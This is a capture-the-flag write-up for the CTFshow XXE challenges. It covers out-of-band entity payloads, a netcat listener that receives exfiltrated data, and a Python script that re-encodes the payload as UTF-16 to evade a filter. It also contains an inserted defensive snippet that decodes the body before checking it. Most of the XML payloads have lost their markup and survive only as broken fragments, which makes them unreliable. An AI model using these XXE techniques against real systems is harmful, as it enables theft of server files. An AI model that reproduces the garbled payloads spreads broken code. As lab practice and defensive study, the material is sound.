CTFSHOW: XXE challenges

Table of contents

    • web373
    • web374, 375, 376
    • web377
    • web378 (couldn't solve)

web373

payload


]>

&xxe;

web374, 375, 376

payload



%aaa;
]>
123

test.dtd

 ">
%dtd;
%xxe;

Start a listener on the server: nc -lvp 9999

web377

payload

import requests

url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
payload = """

%aaa;
]>
123"""
# Re-encode the XML body as UTF-16 before sending it
payload = payload.encode('utf-16')
requests.post(url, data=payload)

Start the listener and get the flag.
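
The web377 script re-encodes the request body as UTF-16. The following is an added example, not part of the original write-up: it shows why a check that scans raw bytes sees no markup in such a body, and a check that decodes before inspecting. The `naive_filter` function is an assumed stand-in for a byte-level filter, not the challenge's code, and the sample document is constructed.

```python
import codecs
import re

# BOMs, longest first: the UTF-32 LE BOM begins with the UTF-16 LE BOM.
BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32"),
    (codecs.BOM_UTF32_BE, "utf-32"),
    (codecs.BOM_UTF8, "utf-8-sig"),
    (codecs.BOM_UTF16_LE, "utf-16"),
    (codecs.BOM_UTF16_BE, "utf-16"),
]
DTD_MARKERS = re.compile(r"<!(DOCTYPE|ENTITY)")


def naive_filter(body: bytes) -> bool:
    """Assumed weak check: scan the raw bytes. True means 'reject'."""
    return b"<!DOCTYPE" in body or b"<!ENTITY" in body


def decode_xml_body(body: bytes) -> str:
    """Simplified encoding detection: BOM first, then the NUL pattern
    around the leading '<', otherwise UTF-8."""
    for bom, codec in BOMS:
        if body.startswith(bom):
            return body.decode(codec)
    if body[:2] == b"<\x00":
        return body.decode("utf-16-le")
    if body[:2] == b"\x00<":
        return body.decode("utf-16-be")
    return body.decode("utf-8")


def rejects_dtd(body: bytes) -> bool:
    """True if the decoded document declares a DOCTYPE or ENTITY."""
    try:
        text = decode_xml_body(body)
    except ValueError:  # UnicodeDecodeError is a ValueError: fail closed
        return True
    # Leftover NULs mean the encoding guess was wrong: fail closed too.
    return "\x00" in text or bool(DTD_MARKERS.search(text))


# Constructed sample: internal entity only, no external reference.
SAMPLE = '<?xml version="1.0"?><!DOCTYPE a [<!ENTITY x "1">]><a>&x;</a>'

if __name__ == "__main__":
    for name in ("utf-8", "utf-16"):
        raw = SAMPLE.encode(name)
        print(name, "naive:", naive_filter(raw), "decoded:", rejects_dtd(raw))
```

Input filtering of this kind is only a backstop; the primary fix is to configure the XML parser so that it does not load DTDs or resolve external entities.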

web378 (couldn't solve)
